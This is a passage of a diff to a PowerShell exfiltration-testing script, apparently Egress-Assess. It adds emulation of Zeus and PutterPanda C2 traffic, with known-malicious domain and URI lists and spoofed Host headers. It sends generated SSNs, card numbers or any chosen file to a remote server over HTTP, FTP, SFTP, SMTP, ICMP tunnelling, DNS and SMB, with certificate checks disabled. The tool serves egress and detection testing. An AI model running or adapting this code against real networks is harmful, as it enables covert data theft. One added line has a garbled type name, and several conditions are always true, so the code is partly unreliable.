'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + '/administrator/modules/mod_menu/help/config.jpg', + '/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php') + #$post_data = @('zeus_id uid=0(root) gid=0(root) groups=0(root)','zeus_whoami root'},'zeus_dir C:\\, C:\\Windows', + # 'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe','zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1', + # 'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20') + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + + Do + { + try + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + + function Use-PutterPanda + { + function Gen-Numbers($num) + { + if ($num -eq 5) + { + Get-Random -Minimum 10000 -Maximum 99999 + } + elseif ($num -eq 2) + { + Get-Random -Minimum 10 -Maximum 99 + } + elseif ($num -eq 6) + { + Get-Random -Minimum 100000 -Maximum 999999 + } + elseif ($num -eq 7) + { + Get-Random -Minimum 1000000 -Maximum 9999999 + } + } + + $domains = @('ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com', + 'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org', + 't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net', + 'jj-desk.com', 'satelliteclub.info', 'space-today.info', + 'sst1.info', 'stream-media.info', 'webfilestore.net') + $encodedHostnames = @('SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u', + 'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=', + 'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==', + 'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292', + 'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==', + 'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292') + $uris = @($("/search5" + $(Gen-Numbers(5)) + "?h1=" + $(Gen-Numbers(2)) + "&h2=" + $(Get-Random -SetSeed 13) + "&h3=" + $(Gen-Numbers(6)) + "&h4=" + $(Gen-Numbers(5))), + $("/microsoft/errorpost/default/connect.aspx?ID=" + $(Gen-Numbers(5))), + $("/MicrosoftUpdate/ShellEX/KB" + $(Gen-Numbers(7)) + '/default.aspx?tmp=' + $(Get-Random -InputObject $encodedHostnames)), + $("/microsoft/errorpost/default.aspx?ID=" + $(Gen-Numbers(5))), + $("/MicrosoftUpdate/GetUpdate/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject $encodedHostnames)), + $("/MicrosoftUpdate/GetFiles/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject $encodedHostnames)), + $("/MicrosoftUpdate/WWRONG/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject $encodedHostnames))) + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + + Do + { + try + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + ############################# + # End Malware Signatures # + ############################# + function Use-Actor($Actor) + { + if ($Actor -contains "Zeus") + { + Use-Zeus + Break + } + elseif ($Actor -contains "PutterPanda") + { + Use-PutterPanda + Break + } + elseif ($Actor -contains "DarkHotel") + { + Use-DarkHotel + Break + } + elseif ($Actor -contains "Etumbot") + { + Use-Etumbot + Break + } + } + + function Use-HTTP + { + + function Get-UserAgent($UASelect) + { + function Use-Mozilla + { + $script:UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" + } + + function Use-InternetExplorer + { + $script:UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" + } + + function Use-Safari + { + $script:UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" + } + + if ($UASelect -contains "IE" -or "Moz" -or "Saf") + { + + if ($UASelect -contains "IE") + { + Use-InternetExplorer + } + if ($UASelect -contains "Moz") + { + Use-Mozilla + } + if ($UASelect -contains "Saf") + { + Use-Safari + } + } + else + { + $r = Get-Random -Minimum 1 -Maximum 3 + Write-Verbose "Switching function" + switch ($r) # Use switch statement to + { + 1 { Use-Mozilla } + 2 { Use-InternetExplorer } + 3 { Use-Safari } + } + } + + } + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + $totalupload = 0 + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity $Data = $AllNames } if ($client -eq "http") @@ -384,32 +1100,9 @@ function Invoke-EgressAssess { $Url = "https://" + $IP + "/post_data.php" } - $uri = New-Object -TypeName System.Uri -ArgumentList $Url - $wc = New-Object -TypeName System.Net.WebClient - if ($proxy) - { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $wc.proxy = $proxy - } - Do { - Try { - Write-Verbose "Uploading data..." - $wc.UploadString($uri, $Data) - $totalupload += $sizedata - } - catch - { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, tranfer failed with error:" - Write-Verbose $ErrorMessage - Break - } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + } + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } @@ -434,13 +1127,26 @@ function Invoke-EgressAssess [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } $uri = New-Object -TypeName System.Uri -ArgumentList $Url $wc = New-Object -TypeName System.Net.WebClient + if ($UserAgent) + { + Get-UserAgent -UASelect $UserAgent + $wc.Headers.Add('UserAgent', $script:UserAgent) + } + else + { + Get-UserAgent -UASelect "" + $wc.Headers.Add('UserAgent', $script:UserAgent) + } + if ($proxy) { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $proxy = [Slslsstem.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $wc.proxy = $proxy } - if ($filetransfer -eq $true) { + if ($filetransfer -eq $true) + { + $data = Get-Content $SourceFilePath -Encoding Byte -ReadCount 0 $wc.Headers.Add('Content-Type', 'mimeType') $wc.Headers.Add('Filename', $FileName) @@ -448,77 +1154,16 @@ function Invoke-EgressAssess $wc.UploadData($uri, 'POST', $data) Write-Verbose "[*] Transaction Complete." } - - else { - Write-Verbose "Uploading data.." - $wc.UploadString($uri, $Body) - Write-Verbose "[*] Transaction Complete." - } - } - - function Use-Ftp - { - if ($Datatype -contains "ssn" -or "cc" -or "identity") - { - if ($Datatype -eq "ssn") { - Generate-SSN - $FTPData = $AllSSN - } - elseif ($Datatype -eq "cc") { - Generate-CreditCards - $FTPData = $AllCC - } - elseif ($Datatype -eq "identity") { - Generate-Names - $FTPData = $AllNames - } - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $Path = get-childitem $Datatype | % { $_.Name } - $filetransfer = $True - } - } - if ($filetransfer -eq $True) { - $Destination = "ftp://" + $IP + "/" + $Path - $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } - $webclient = New-Object System.Net.WebClient - $webclient.Credentials = New-Object System.Net.NetworkCredential($username,$password) - if ($proxy) + else + { + Do { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $webclient.proxy = $proxy - } - $uri = New-Object System.Uri($Destination) - $webclient.UploadFile($uri, $SourceFilePath) - Write-Verbose "[*] File Transfer Complete." - } - else { - Do { - Try { - $Date = Get-Date -Format Mdyyyy_hhmmss - $Path = "ftpdata" + $Date + ".txt" - $Destination = "ftp://" + $IP + "/" + $Path - $Credential = New-Object -TypeName System.Net.NetworkCredential -ArgumentList $Username, $Password - - # Create the FTP request and upload the file - $FtpRequest = [System.Net.FtpWebRequest][System.Net.WebRequest]::Create($Destination) - if ($proxy) + Try { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $FtpRequest.proxy = $proxy - } - $FtpRequest.KeepAlive = $False - $FtpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile - $FtpRequest.Credentials = $Credential - # Get the request stream, and write the file bytes to the stream - $Encoder = [system.Text.Encoding]::UTF8 - $RequestStream = $FtpRequest.GetRequestStream() - $Encoder.GetBytes($FTPData) | % { $RequestStream.WriteByte($_); } - $RequestStream.Close() - Write-Verbose "[*] File Transfer Complete." + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + $totalupload += $sizedata } catch { @@ -530,9 +1175,96 @@ function Invoke-EgressAssess Write-Verbose "[*] Transfer complete!" $loops-- Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) - } - + } + While ($loops -gt 0) + } + } + + function Use-Ftp + { + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + if ($Datatype -eq "ssn") + { + Generate-SSN + $FTPData = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $FTPData = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $FTPData = $AllNames + } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $Path = get-childitem $Datatype | % { $_.Name } + $filetransfer = $True + } + } + if ($filetransfer -eq $True) + { + $Destination = "ftp://" + $IP + "/" + $Path + $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } + $webclient = New-Object System.Net.WebClient + $webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password) + if ($proxy) + { + $proxy = [System.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $webclient.proxy = $proxy + } + $uri = New-Object System.Uri($Destination) + $webclient.UploadFile($uri, $SourceFilePath) + Write-Verbose "[*] File Transfer Complete." + } + else + { + Do + { + Try + { + $Date = Get-Date -Format Mdyyyy_hhmmss + $Path = "ftpdata" + $Date + ".txt" + $Destination = "ftp://" + $IP + "/" + $Path + $Credential = New-Object -TypeName System.Net.NetworkCredential -ArgumentList $Username, $Password + + # Create the FTP request and upload the file + $FtpRequest = [System.Net.FtpWebRequest][System.Net.WebRequest]::Create($Destination) + if ($proxy) + { + $proxy = [System.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $FtpRequest.proxy = $proxy + } + $FtpRequest.KeepAlive = $False + $FtpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile + $FtpRequest.Credentials = $Credential + # Get the request stream, and write the file bytes to the stream + $Encoder = [system.Text.Encoding]::UTF8 + $RequestStream = $FtpRequest.GetRequestStream() + $Encoder.GetBytes($FTPData) | % { $RequestStream.WriteByte($_); } + $RequestStream.Close() + Write-Verbose "[*] File Transfer Complete." + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } } function Use-SFTP @@ -546,21 +1278,25 @@ function Invoke-EgressAssess } if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN $FTPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $FTPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity $FTPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } } } else @@ -579,11 +1315,13 @@ function Invoke-EgressAssess Write-Verbose "[*] Error loading dll" Break } - - if ($global:FileTransfer -eq $True) { + + if ($global:FileTransfer -eq $True) + { $Path = get-childitem $Datatype | % { $_.Name } } - else { + else + { $Date = Get-Date -Format Mdyyyy_hhmmss $Path = "ftpdata" + $Date + ".txt" try @@ -597,7 +1335,7 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - } + } # Connect to Egress-Assess Server try { @@ -610,8 +1348,10 @@ function Invoke-EgressAssess Write-Verbose "[*] Connection failed" Return } - if ($global:FileTransfer -eq $True) { - try { + if ($global:FileTransfer -eq $True) + { + try + { Write-Verbose "[*] Uploading data.." $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } $FileStream = [System.IO.File]::OpenRead("$SourceFilePath") @@ -623,14 +1363,17 @@ function Invoke-EgressAssess $sftpClient.Disconnect() $sftpClient.Dispose() } - catch { + catch + { $ErrorMessage = $_.Exception.Message Write-Verbose $ErrorMessage Break } } - else { - try { + else + { + try + { Write-Verbose "[*] Uploading data.." $FileStream = [System.IO.File]::OpenRead("$env:temp\$Path") $sftpClient.UploadFile($FileStream, $Path) @@ -643,7 +1386,8 @@ function Invoke-EgressAssess $ErrorMessage = $_.Exception.Message Remove-Item -Path $env:temp\$Path } - catch { + catch + { $ErrorMessage = $_.Exception.Message Write-Verbose $ErrorMessage Break @@ -656,71 +1400,84 @@ function Invoke-EgressAssess { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN $SMTPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $SMTPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity $SMTPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $filetransfer = $True - $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } - } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $filetransfer = $True + $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } + } } else { Write-Verbose "[*] You did not provide a data type to generate." } - Do { - Try { - if ($filetransfer -eq $true) { - Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP - } - else { - Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP - } - } - catch + Do { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, tranfer failed with error:" - Write-Verbose $ErrorMessage - Break + Try + { + if ($filetransfer -eq $true) + { + Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP + } + else + { + Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP + } + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + While ($loops -gt 0) } function Use-ICMP { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$ICMPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$ICMPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$ICMPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $filetransfer = $true + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $filetransfer = $true } } else @@ -734,8 +1491,8 @@ function Invoke-EgressAssess $FinalDestination = [System.Net.Dns]::GetHostEntry($IP) } catch - { Write-Verbose "[*] Hostname not resolved" - + { + Write-Verbose "[*] Hostname not resolved" Return } } @@ -747,7 +1504,7 @@ function Invoke-EgressAssess $PacketNumber = 1 $bufferSize = 1050 $Timeout = 1000 - + if ($FileTransfer -eq $True) { $Delimiter = '.:::-989-:::.' @@ -779,22 +1536,24 @@ function Invoke-EgressAssess } else { - Do { - try { + Do + { + try + { Write-Verbose "[*] Sending data via ICMP." [int]$TotalPackets = ($ICMPData.length/$bufferSize) While ($ByteReader -le ($ICMPData.length - $bufferSize)) { - Write-Verbose "[*] Sending $PacketNumber of $TotalPackets packets" - $DataToSend = $ICMPData.Substring($ByteReader, $bufferSize) - $Encoder = [system.Text.Encoding]::UTF8 - $DataBytes = $Encoder.GetBytes($DataToSend) - $EncodedData = [System.Convert]::ToBase64String($DataBytes) - $Buffer = $Encoder.GetBytes($EncodedData) - $Ping = New-Object -TypeName System.Net.NetworkInformation.Ping - $PingReply = $Ping.Send($FinalDestination, $Timeout, $Buffer) - $ByteReader += $bufferSize - $PacketNumber++ + Write-Verbose "[*] Sending $PacketNumber of $TotalPackets packets" + $DataToSend = $ICMPData.Substring($ByteReader, $bufferSize) + $Encoder = [system.Text.Encoding]::UTF8 + $DataBytes = $Encoder.GetBytes($DataToSend) + $EncodedData = [System.Convert]::ToBase64String($DataBytes) + $Buffer = $Encoder.GetBytes($EncodedData) + $Ping = New-Object -TypeName System.Net.NetworkInformation.Ping + $PingReply = $Ping.Send($FinalDestination, $Timeout, $Buffer) + $ByteReader += $bufferSize + $PacketNumber++ } } catch @@ -809,7 +1568,8 @@ function Invoke-EgressAssess $PacketNumber = 0 $loops-- Write-Verbose "[*] $loops loops remaining.." - } While ($Loops -gt 0) + } + While ($Loops -gt 0) } } @@ -818,27 +1578,33 @@ function Invoke-EgressAssess { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$DNSData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$DNSData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$DNSData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - Write-Verbose "[*] You did not provide a data type to generate." - Write-Verbose "[*] DNS file transfers currently not supported." - break + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + Write-Verbose "[*] You did not provide a data type to generate." + Write-Verbose "[*] DNS file transfers currently not supported." + break } } - Do { - try { + Do + { + try + { [int]$MaxLenth = 63 [int]$DefaultLength = 35 [int]$ByteReader = 0 @@ -870,10 +1636,10 @@ function Invoke-EgressAssess } catch { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, DNS data tranfer failed with error:" - Write-Verbose $ErrorMessage - Break + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, DNS data tranfer failed with error:" + Write-Verbose $ErrorMessage + Break } } } @@ -884,41 +1650,48 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } function Use-DNSResolved { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$DNSData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$DNSData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$DNSData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - Write-Verbose "[*] You did not provide a data type to generate." - Write-Verbose "[*] DNS file transfers currently not supported." - break + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + Write-Verbose "[*] You did not provide a data type to generate." + Write-Verbose "[*] DNS file transfers currently not supported." + break } } else { Write-Verbose "[*] You did not provide a data type to generate." } - Do { - try { + Do + { + try + { Write-Verbose "Sending data via DNS..this may take awhile." $ByteReader = 0 While ($ByteReader -le ($DNSData.length - 20)) @@ -938,10 +1711,11 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } function Use-SMB @@ -956,50 +1730,53 @@ function Invoke-EgressAssess Generate-SSN [string]$SMBData = $AllSSN } - elseif ($Datatype -eq "identity") { - Generate-Names - [string]$SMBData = $AllNames - } - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { + elseif ($Datatype -eq "identity") + { + Generate-Identity + [string]$SMBData = $AllNames + } + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - Write-Verbose "[*] Sending file to egress server.." + Write-Verbose "[*] Sending file to egress server.." + try + { + Copy-Item -Path $Datatype -Destination \\$IP\data + Write-Verbose "[*] File transfer complete." + Break + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, file tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + + } + # If we're sending faux data, generate the file, send and delete it. + Do + { + try + { + $Date = Get-Date -Format Mdyyyy_hhmmss + $Path = "smbdata_" + $Date + ".txt" + $SMBData | Out-File "$env:temp\$Path" + Copy-Item -Path $env:temp\$Path -Destination \\$IP\data + try { - Copy-Item -Path $Datatype -Destination \\$IP\data - Write-Verbose "[*] File transfer complete." - Break + Remove-Item -Path $env:temp\$Path } catch { $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, file tranfer failed with error:" + Write-Verbose "[*] Error, unable to remove temporary file." Write-Verbose $ErrorMessage Break } - - } - # If we're sending faux data, generate the file, send and delete it. - Do { - try - { - $Date = Get-Date -Format Mdyyyy_hhmmss - $Path = "smbdata_" + $Date + ".txt" - $SMBData | Out-File "$env:temp\$Path" - Copy-Item -Path $env:temp\$Path -Destination \\$IP\data - - try - { - Remove-Item -Path $env:temp\$Path - } - catch - { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, unable to remove temporary file." - Write-Verbose $ErrorMessage - Break - } - } + } catch { $ErrorMessage = $_.Exception.Message @@ -1007,12 +1784,13 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) } - + #write report to console and file to C:\Egress-Assess\report.txt #future enhancement: add variable input for report path and filename #future enhancement: add filename of exfilled file to report @@ -1022,21 +1800,22 @@ function Invoke-EgressAssess Write-Verbose "----------Egress-Assess Report----------" Write-Verbose "Report File = $Report" $EAreport = [ordered]@{ - "Server"=$IP - "Datatype"=$datatype.toUpper() - "Protocol"=$client.toUpper() - "Size (MB)"=$Size - "Loops"=$loops - "Time (seconds)"=[Math]::Round($(($endTime-$startTime).totalseconds),2) + "Server" = $IP + "Datatype" = $datatype.toUpper() + "Protocol" = $client.toUpper() + "Size (MB)" = $Size + "Loops" = $loops + "Time (seconds)" = [Math]::Round($(($endTime - $startTime).totalseconds), 2) "Date" = Get-Date } try { - if((Test-Path -path $Report) -eq $False) + if ((Test-Path -path $Report) -eq $False) { Write-Verbose "[*] Writing new report file..." $null > $Report - } else {} + } + else { } Write-Output $EAreport | Format-Table | Tee-Object -file $Report -Append } catch @@ -1045,64 +1824,68 @@ function Invoke-EgressAssess break } } - } process { - if (!$NoPing) { - Test-ServerConnection - } + if ($Actor) + { + Use-Actor 